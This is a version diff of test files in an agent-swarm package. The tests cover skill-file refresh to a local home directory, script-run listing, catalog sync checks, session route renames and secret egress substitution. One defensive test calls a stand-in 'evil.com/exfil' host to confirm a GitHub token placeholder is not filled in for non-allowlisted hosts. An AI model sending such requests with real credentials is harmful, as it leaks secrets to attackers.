@desplega.ai/agent-swarm 1.92.2 → 1.93.0

package/src/tests/runner-skills-refresh.test.ts

@@ -1,34 +1,68 @@
 /**
  * Coverage for the worker-side `refreshSkillsIfChanged()` helper. The helper
  * is exercised against a Bun.serve() stub that mimics the signature + list
- * + sync-filesystem endpoints. Cases lock down its contract: cheap probe on
- * no-change, full refresh on hash drift, inactive/disabled filtering,
- * transient 5xx swallowed.
+ * endpoints. Cases lock down its contract: cheap probe on no-change, full
+ * refresh on hash drift, inactive/disabled filtering, transient 5xx swallowed,
+ * local FS write (not POST to /api/skills/sync-filesystem), and hash-caching
+ * only on successful local write.
  */
 import { afterAll, beforeAll, describe, expect, test } from "bun:test";
+import { existsSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
 import { refreshSkillsIfChanged, type SkillsRefreshContext } from "../utils/skills-refresh";
 
-// ── Bun.serve() stub backing fake signature/list/sync endpoints ──────────────
+// ── Bun.serve() stub backing fake signature/list endpoints ───────────────────
+
+type SkillStub = {
+  id: string;
+  name: string;
+  description: string;
+  content: string | null;
+  isComplex: boolean;
+  isActive: boolean;
+  isEnabled: boolean;
+};
 
 type StubState = {
   signatureHash: string;
   signatureStatus: number;
-  syncStatus: number;
+  listStatus: number;
   skillsBody: {
-    skills: { name: string; description: string; isActive: boolean; isEnabled: boolean }[];
+    skills: SkillStub[];
     signature: string;
   };
   calls: { signature: number; list: number; sync: number };
+  skillFilesStatus: number;
 };
 
+const FAKE_HOME = join(tmpdir(), `runner-refresh-test-${process.pid}`);
+
 const state: StubState = {
   signatureHash: "hash-v1",
   signatureStatus: 200,
-  syncStatus: 200,
+  listStatus: 200,
+  skillFilesStatus: 200,
   skillsBody: {
     skills: [
-      { name: "alpha", description: "first skill", isActive: true, isEnabled: true },
-      { name: "beta", description: "second skill", isActive: true, isEnabled: true },
+      {
+        id: "skill-alpha",
+        name: "alpha",
+        description: "first skill",
+        content: "---\nname: alpha\n---\n\nAlpha body.",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
+      {
+        id: "skill-beta",
+        name: "beta",
+        description: "second skill",
+        content: "---\nname: beta\n---\n\nBeta body.",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
     ],
     signature: "hash-v1",
   },
@@ -40,6 +74,8 @@ let baseUrl = "";
 
 describe("refreshSkillsIfChanged", () => {
   beforeAll(() => {
+    mkdirSync(FAKE_HOME, { recursive: true });
+
     server = Bun.serve({
       port: 0,
       fetch(req) {
@@ -57,18 +93,23 @@ describe("refreshSkillsIfChanged", () => {
         }
         if (url.pathname.match(/\/api\/agents\/[^/]+\/skills$/)) {
           state.calls.list++;
+          if (state.listStatus !== 200) {
+            return new Response("err", { status: state.listStatus });
+          }
           return Response.json({
             skills: state.skillsBody.skills,
             total: state.skillsBody.skills.length,
             signature: state.skillsBody.signature,
           });
         }
+        // Track that the old sync-filesystem endpoint is NOT called
         if (url.pathname === "/api/skills/sync-filesystem") {
           state.calls.sync++;
-          if (state.syncStatus !== 200) {
-            return new Response("sync err", { status: state.syncStatus });
-          }
-          return Response.json({ synced: 2, removed: 0, errors: [] });
+          return Response.json({ synced: 0, removed: 0, errors: [] });
+        }
+        // Complex skill: file manifest
+        if (url.pathname.match(/\/api\/skills\/[^/]+\/files$/) && state.skillFilesStatus === 200) {
+          return Response.json({ files: [], total: 0 });
         }
         return new Response("not found", { status: 404 });
       },
@@ -78,6 +119,7 @@ describe("refreshSkillsIfChanged", () => {
 
   afterAll(() => {
     server?.stop(true);
+    rmSync(FAKE_HOME, { recursive: true, force: true });
   });
 
   function makeCtx(): SkillsRefreshContext {
@@ -90,13 +132,22 @@ describe("refreshSkillsIfChanged", () => {
     };
   }
 
-  test("first call populates summary and updates the cached hash", async () => {
+  // Thin helper to pass homeOverride through to refreshSkillsIfChanged
+  async function refreshWithHome(
+    ctx: SkillsRefreshContext,
+    lastHashRef: { current: string | null },
+    home: string,
+  ) {
+    return refreshSkillsIfChanged(ctx, lastHashRef, home);
+  }
+
+  test("first call writes SKILL.md to local HOME and updates cached hash", async () => {
     state.calls = { signature: 0, list: 0, sync: 0 };
     state.signatureHash = "hash-v1";
     state.skillsBody.signature = "hash-v1";
 
     const lastHash = { current: null as string | null };
-    const result = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    const result = await refreshWithHome(makeCtx(), lastHash, FAKE_HOME);
 
     expect(result.changed).toBe(true);
     expect(result.summary).toEqual([
@@ -104,14 +155,24 @@ describe("refreshSkillsIfChanged", () => {
       { name: "beta", description: "second skill" },
     ]);
     expect(lastHash.current).toBe("hash-v1");
-    expect(state.calls).toEqual({ signature: 1, list: 1, sync: 1 });
+
+    // SKILL.md files must be written on the local worker disk
+    const alphaFile = join(FAKE_HOME, ".claude", "skills", "alpha", "SKILL.md");
+    const betaFile = join(FAKE_HOME, ".claude", "skills", "beta", "SKILL.md");
+    expect(existsSync(alphaFile)).toBe(true);
+    expect(readFileSync(alphaFile, "utf-8")).toContain("Alpha body.");
+    expect(existsSync(betaFile)).toBe(true);
+
+    // Must NOT have called /api/skills/sync-filesystem
+    expect(state.calls.sync).toBe(0);
+    expect(state.calls).toEqual({ signature: 1, list: 1, sync: 0 });
   });
 
-  test("subsequent call with unchanged hash skips list + sync", async () => {
+  test("subsequent call with unchanged hash skips list + write", async () => {
     state.calls = { signature: 0, list: 0, sync: 0 };
     const lastHash = { current: "hash-v1" };
 
-    const result = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    const result = await refreshWithHome(makeCtx(), lastHash, FAKE_HOME);
 
     expect(result.changed).toBe(false);
     expect(result.summary).toBeUndefined();
@@ -119,82 +180,191 @@ describe("refreshSkillsIfChanged", () => {
     expect(state.calls).toEqual({ signature: 1, list: 0, sync: 0 });
   });
 
-  test("hash drift refetches list and updates cached hash to the list's snapshot", async () => {
+  test("hash drift refetches list, writes new skill, updates cached hash", async () => {
     state.calls = { signature: 0, list: 0, sync: 0 };
     state.signatureHash = "hash-v2";
     state.skillsBody.signature = "hash-v2";
     state.skillsBody.skills = [
-      { name: "alpha", description: "first skill", isActive: true, isEnabled: true },
-      { name: "beta", description: "second skill", isActive: true, isEnabled: true },
-      { name: "gamma", description: "third skill", isActive: true, isEnabled: true },
+      {
+        id: "skill-alpha",
+        name: "alpha",
+        description: "first skill",
+        content: "---\nname: alpha\n---\n\nAlpha updated.",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
+      {
+        id: "skill-beta",
+        name: "beta",
+        description: "second skill",
+        content: "---\nname: beta\n---\n\nBeta body.",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
+      {
+        id: "skill-gamma",
+        name: "gamma",
+        description: "third skill",
+        content: "---\nname: gamma\n---\n\nGamma body.",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
     ];
 
     const lastHash = { current: "hash-v1" };
-    const result = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    const result = await refreshWithHome(makeCtx(), lastHash, FAKE_HOME);
 
     expect(result.changed).toBe(true);
     expect(result.summary).toHaveLength(3);
     expect(lastHash.current).toBe("hash-v2");
-    expect(state.calls).toEqual({ signature: 1, list: 1, sync: 1 });
+
+    const gammaFile = join(FAKE_HOME, ".claude", "skills", "gamma", "SKILL.md");
+    expect(existsSync(gammaFile)).toBe(true);
+    expect(readFileSync(gammaFile, "utf-8")).toContain("Gamma body.");
+    expect(state.calls.sync).toBe(0); // never POSTed
   });
 
-  test("filters out inactive or disabled skills from the summary", async () => {
+  test("filters out inactive or disabled skills from summary and does not write them", async () => {
     state.calls = { signature: 0, list: 0, sync: 0 };
     state.signatureHash = "hash-v3";
     state.skillsBody.signature = "hash-v3";
     state.skillsBody.skills = [
-      { name: "active", description: "kept", isActive: true, isEnabled: true },
-      { name: "disabled", description: "dropped", isActive: true, isEnabled: false },
-      { name: "inactive", description: "dropped", isActive: false, isEnabled: true },
+      {
+        id: "skill-active",
+        name: "active-skill",
+        description: "kept",
+        content: "# Active",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
+      {
+        id: "skill-disabled",
+        name: "disabled-skill",
+        description: "dropped",
+        content: "# Disabled",
+        isComplex: false,
+        isActive: true,
+        isEnabled: false,
+      },
+      {
+        id: "skill-inactive",
+        name: "inactive-skill",
+        description: "dropped",
+        content: "# Inactive",
+        isComplex: false,
+        isActive: false,
+        isEnabled: true,
+      },
     ];
 
     const lastHash = { current: "hash-v2" };
-    const result = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    const result = await refreshWithHome(makeCtx(), lastHash, FAKE_HOME);
 
     expect(result.changed).toBe(true);
-    expect(result.summary).toEqual([{ name: "active", description: "kept" }]);
+    expect(result.summary).toEqual([{ name: "active-skill", description: "kept" }]);
+
+    const disabledFile = join(FAKE_HOME, ".claude", "skills", "disabled-skill", "SKILL.md");
+    const inactiveFile = join(FAKE_HOME, ".claude", "skills", "inactive-skill", "SKILL.md");
+    expect(existsSync(disabledFile)).toBe(false);
+    expect(existsSync(inactiveFile)).toBe(false);
   });
 
-  test("transient 5xx on signature endpoint returns changed:false without touching list/sync", async () => {
+  test("transient 5xx on signature endpoint returns changed:false without touching list/write", async () => {
     state.calls = { signature: 0, list: 0, sync: 0 };
     state.signatureStatus = 503;
 
     const lastHash = { current: "hash-v3" };
-    const result = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    const result = await refreshWithHome(makeCtx(), lastHash, FAKE_HOME);
 
     expect(result.changed).toBe(false);
     expect(lastHash.current).toBe("hash-v3");
     expect(state.calls).toEqual({ signature: 1, list: 0, sync: 0 });
 
-    state.signatureStatus = 200; // restore for any later tests
+    state.signatureStatus = 200; // restore
   });
 
-  test("sync-filesystem failure leaves cached hash unchanged so the next poll retries", async () => {
-    // Server-side state: a new hash + skill set, sync endpoint failing.
+  test("local write failure leaves cached hash unchanged so the next poll retries", async () => {
+    // Use a read-only HOME path to force a write failure
+    const readOnlyHome = join(FAKE_HOME, "readonly-home");
+    mkdirSync(readOnlyHome, { recursive: true });
+
     state.signatureHash = "hash-v4";
     state.skillsBody.signature = "hash-v4";
     state.skillsBody.skills = [
-      { name: "alpha", description: "first", isActive: true, isEnabled: true },
+      {
+        id: "skill-alpha",
+        name: "alpha",
+        description: "first",
+        content: "# Alpha",
+        isComplex: false,
+        isActive: true,
+        isEnabled: true,
+      },
     ];
-    state.syncStatus = 503;
     state.calls = { signature: 0, list: 0, sync: 0 };
 
+    // Make the claude skills dir a FILE (not a dir) so mkdir fails on write
+    const blockerPath = join(readOnlyHome, ".claude");
+    mkdirSync(join(readOnlyHome), { recursive: true });
+    // Write a file at .claude to block mkdirSync from creating it as a dir
+    writeFileSync(blockerPath, "blocker");
+
     const lastHash = { current: "hash-prev" };
-    const first = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    const first = await refreshWithHome(makeCtx(), lastHash, readOnlyHome);
 
-    // Summary still returns (the list call succeeded), but the cached
-    // hash must NOT advance — otherwise the next signature probe would
-    // short-circuit and the FS would stay stale forever.
+    // Summary still returns (the list call succeeded), but cached hash must
+    // NOT advance — FS write failed
     expect(first.changed).toBe(true);
     expect(first.summary).toEqual([{ name: "alpha", description: "first" }]);
     expect(lastHash.current).toBe("hash-prev");
-    expect(state.calls).toEqual({ signature: 1, list: 1, sync: 1 });
+    expect(state.calls.sync).toBe(0); // still never calls sync-filesystem
 
-    // Sync recovers — next poll retries because cached hash still differs.
-    state.syncStatus = 200;
-    const second = await refreshSkillsIfChanged(makeCtx(), lastHash);
+    // Clean up the blocker
+    rmSync(readOnlyHome, { recursive: true, force: true });
+
+    // Normal write in a clean home recovers — next poll retries because hash differs
+    state.calls = { signature: 0, list: 0, sync: 0 };
+    const cleanHome = join(FAKE_HOME, "clean-home");
+    mkdirSync(cleanHome, { recursive: true });
+    const second = await refreshWithHome(makeCtx(), lastHash, cleanHome);
     expect(second.changed).toBe(true);
     expect(lastHash.current).toBe("hash-v4");
-    expect(state.calls).toEqual({ signature: 2, list: 2, sync: 2 });
+    expect(state.calls.sync).toBe(0);
+    rmSync(cleanHome, { recursive: true, force: true });
+  });
+
+  test("list fetch failure after signature drift leaves pre-existing skills on disk and does not advance hash", async () => {
+    // Arrange: fresh isolated home with a pre-existing swarm-managed skill
+    const isolatedHome = join(FAKE_HOME, "list-fail-home");
+    const skillDir = join(isolatedHome, ".claude", "skills", "pre-existing");
+    mkdirSync(skillDir, { recursive: true });
+    writeFileSync(join(skillDir, ".swarm-managed"), "");
+    writeFileSync(join(skillDir, "SKILL.md"), "# Pre-existing skill");
+
+    // Simulate signature drift so the list endpoint is called
+    state.signatureHash = "hash-new";
+    state.listStatus = 503; // List fetch fails
+    state.calls = { signature: 0, list: 0, sync: 0 };
+
+    const lastHash = { current: "hash-old" };
+    const result = await refreshWithHome(makeCtx(), lastHash, isolatedHome);
+
+    // Must bail out without touching disk
+    expect(result.changed).toBe(false);
+    // Cached hash must NOT advance — disk is still in "old" state
+    expect(lastHash.current).toBe("hash-old");
+    // List endpoint was called (signature differed) but the failure must bail early
+    expect(state.calls.list).toBe(1);
+    // Pre-existing managed skill file must survive
+    expect(existsSync(join(skillDir, "SKILL.md"))).toBe(true);
+    expect(readFileSync(join(skillDir, "SKILL.md"), "utf-8")).toBe("# Pre-existing skill");
+
+    // Restore
+    state.listStatus = 200;
+    rmSync(isolatedHome, { recursive: true, force: true });
   });
 });

package/src/tests/script-runs-http.test.ts

@@ -141,9 +141,15 @@ describe("/api/script-runs HTTP", () => {
 
     const listed = await dispatch("/api/script-runs", { agentId });
     expect(listed.status).toBe(200);
-    const listBody = (await listed.json()) as { runs: Array<{ id: string }>; total: number };
+    const listBody = (await listed.json()) as {
+      runs: Array<{ id: string; source?: string; args?: unknown; output?: unknown }>;
+      total: number;
+    };
     expect(listBody.total).toBe(1);
     expect(listBody.runs[0]?.id).toBe(body.id);
+    expect(listBody.runs[0]?.source).toBeUndefined();
+    expect(listBody.runs[0]?.args).toBeUndefined();
+    expect(listBody.runs[0]?.output).toBeUndefined();
   });
 
   test("returns the existing run for an idempotency key", async () => {

package/src/tests/scripts-runtime-secret-egress.test.ts

@@ -1,4 +1,8 @@
 import { afterEach, beforeEach, describe, expect, test } from "bun:test";
+import {
+  buildEgressSecrets,
+  patchFetchWithEgressSubstitution,
+} from "../scripts-runtime/egress-secrets";
 import { runScript } from "../scripts-runtime/loader";
 import { refreshSecretScrubberCache } from "../utils/secret-scrubber";
 
@@ -42,3 +46,128 @@ describe("runtime secret egress", () => {
     expect(output.result).toEqual({ wrapped: "<redacted>" });
   });
 });
+
+describe("egress-substitution", () => {
+  describe("buildEgressSecrets", () => {
+    test("includes GITHUB_TOKEN when set in env", () => {
+      process.env.GITHUB_TOKEN = "ghp_test1234567890abcdef";
+      const secrets = buildEgressSecrets();
+      expect(secrets).toEqual([
+        {
+          placeholder: "[REDACTED:GITHUB_TOKEN]",
+          hosts: ["api.github.com"],
+          value: "ghp_test1234567890abcdef",
+        },
+      ]);
+    });
+
+    test("returns empty array when GITHUB_TOKEN not set", () => {
+      delete process.env.GITHUB_TOKEN;
+      const secrets = buildEgressSecrets();
+      expect(secrets).toEqual([]);
+    });
+  });
+
+  describe("patchFetchWithEgressSubstitution", () => {
+    let originalFetch: typeof globalThis.fetch;
+
+    beforeEach(() => {
+      originalFetch = globalThis.fetch;
+    });
+
+    afterEach(() => {
+      globalThis.fetch = originalFetch;
+    });
+
+    test("substitutes placeholder in Authorization header for allowlisted host", async () => {
+      let capturedHeaders: Headers | undefined;
+      globalThis.fetch = async (_input: any, init?: any) => {
+        capturedHeaders = new Headers(init?.headers);
+        return new Response(JSON.stringify({ ok: true }), { status: 200 });
+      };
+
+      patchFetchWithEgressSubstitution([
+        {
+          placeholder: "[REDACTED:GITHUB_TOKEN]",
+          hosts: ["api.github.com"],
+          value: "ghp_real_secret_value_123",
+        },
+      ]);
+
+      await globalThis.fetch("https://api.github.com/repos/test/test", {
+        headers: { Authorization: "Bearer [REDACTED:GITHUB_TOKEN]" },
+      });
+
+      expect(capturedHeaders?.get("authorization")).toBe("Bearer ghp_real_secret_value_123");
+    });
+
+    test("does NOT substitute for non-allowlisted host", async () => {
+      let capturedHeaders: Headers | undefined;
+      globalThis.fetch = async (_input: any, init?: any) => {
+        capturedHeaders = new Headers(init?.headers);
+        return new Response(JSON.stringify({ ok: true }), { status: 200 });
+      };
+
+      patchFetchWithEgressSubstitution([
+        {
+          placeholder: "[REDACTED:GITHUB_TOKEN]",
+          hosts: ["api.github.com"],
+          value: "ghp_real_secret_value_123",
+        },
+      ]);
+
+      await globalThis.fetch("https://evil.com/exfil", {
+        headers: { Authorization: "Bearer [REDACTED:GITHUB_TOKEN]" },
+      });
+
+      expect(capturedHeaders?.get("authorization")).toBe("Bearer [REDACTED:GITHUB_TOKEN]");
+    });
+
+    test("passes through requests with no redacted placeholders", async () => {
+      let callCount = 0;
+      globalThis.fetch = async (_input: any, _init?: any) => {
+        callCount++;
+        return new Response("ok", { status: 200 });
+      };
+
+      patchFetchWithEgressSubstitution([
+        {
+          placeholder: "[REDACTED:GITHUB_TOKEN]",
+          hosts: ["api.github.com"],
+          value: "ghp_real_secret_value_123",
+        },
+      ]);
+
+      await globalThis.fetch("https://api.github.com/repos/test/test", {
+        headers: { Accept: "application/json" },
+      });
+
+      expect(callCount).toBe(1);
+    });
+
+    test("does not substitute in request body", async () => {
+      let capturedBody: string | undefined;
+      globalThis.fetch = async (_input: any, init?: any) => {
+        capturedBody = init?.body;
+        return new Response("ok", { status: 200 });
+      };
+
+      patchFetchWithEgressSubstitution([
+        {
+          placeholder: "[REDACTED:GITHUB_TOKEN]",
+          hosts: ["api.github.com"],
+          value: "ghp_real_secret_value_123",
+        },
+      ]);
+
+      await globalThis.fetch("https://api.github.com/gists", {
+        method: "POST",
+        headers: { Authorization: "Bearer [REDACTED:GITHUB_TOKEN]" },
+        body: JSON.stringify({ content: "[REDACTED:GITHUB_TOKEN]" }),
+      });
+
+      expect(capturedBody).toContain("[REDACTED:GITHUB_TOKEN]");
+      expect(capturedBody).not.toContain("ghp_real_secret_value_123");
+    });
+  });
+});

package/src/tests/seed-scripts.test.ts

@@ -53,7 +53,7 @@ afterAll(async () => {
 });
 
 describe("seed-scripts catalog", () => {
-  test("manifest holds 17 unique, well-described scripts", () => {
+  test("manifest holds 18 unique, well-described scripts", () => {
     expect(SEED_SCRIPTS.length).toBe(18);
     const names = SEED_SCRIPTS.map((s) => s.name);
     expect(new Set(names).size).toBe(names.length);
@@ -66,6 +66,18 @@ describe("seed-scripts catalog", () => {
     }
   });
 
+  test("inline catalog files stay in sync with their runtime files", async () => {
+    const catalogDir = join(import.meta.dir, "../be/seed-scripts/catalog");
+    const inlineFiles = ["boot-triage", "catalog-report", "compound-insights", "ops-catalog-audit"];
+
+    for (const name of inlineFiles) {
+      const runtimeSource = await Bun.file(join(catalogDir, `${name}.ts`)).text();
+      const inlineSource = await Bun.file(join(catalogDir, `${name}.inline.ts`)).text();
+
+      expect(inlineSource, `${name}.inline.ts drifted from ${name}.ts`).toBe(runtimeSource);
+    }
+  });
+
   test("every catalog script passes the import allowlist and the script typecheck", () => {
     const failures: string[] = [];
     for (const s of SEED_SCRIPTS) {

package/src/tests/session-attach.test.ts

@@ -29,13 +29,13 @@ async function handleRequest(req: {
 }): Promise<{ status: number; body: unknown }> {
   const pathSegments = getPathSegments(req.url || "");
 
-  // PUT /api/tasks/:id/claude-session - Update Claude session ID
+  // PUT /api/tasks/:id/session - Update Claude session ID
   if (
     req.method === "PUT" &&
     pathSegments[0] === "api" &&
     pathSegments[1] === "tasks" &&
     pathSegments[2] &&
-    pathSegments[3] === "claude-session"
+    pathSegments[3] === "session"
   ) {
     const taskId = pathSegments[2];
     const reqBody = req.body ? JSON.parse(req.body) : {};
@@ -233,7 +233,7 @@ describe("Session Attachment", () => {
     });
   });
 
-  describe("API Layer — PUT /api/tasks/:id/claude-session", () => {
+  describe("API Layer — PUT /api/tasks/:id/session", () => {
     test("should update claudeSessionId and return 200", async () => {
       const task = createTaskExtended("Task for API session update", {
         creatorAgentId: "lead-session-test",
@@ -241,7 +241,7 @@ describe("Session Attachment", () => {
       });
 
       const sessionId = "api-session-id-67890";
-      const response = await fetch(`${baseUrl}/api/tasks/${task.id}/claude-session`, {
+      const response = await fetch(`${baseUrl}/api/tasks/${task.id}/session`, {
         method: "PUT",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ claudeSessionId: sessionId }),
@@ -253,7 +253,7 @@ describe("Session Attachment", () => {
     });
 
     test("should return 404 for invalid task", async () => {
-      const response = await fetch(`${baseUrl}/api/tasks/non-existent-task/claude-session`, {
+      const response = await fetch(`${baseUrl}/api/tasks/non-existent-task/session`, {
         method: "PUT",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ claudeSessionId: "some-session" }),
@@ -267,7 +267,7 @@ describe("Session Attachment", () => {
         creatorAgentId: "lead-session-test",
       });
 
-      const response = await fetch(`${baseUrl}/api/tasks/${task.id}/claude-session`, {
+      const response = await fetch(`${baseUrl}/api/tasks/${task.id}/session`, {
         method: "PUT",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({}),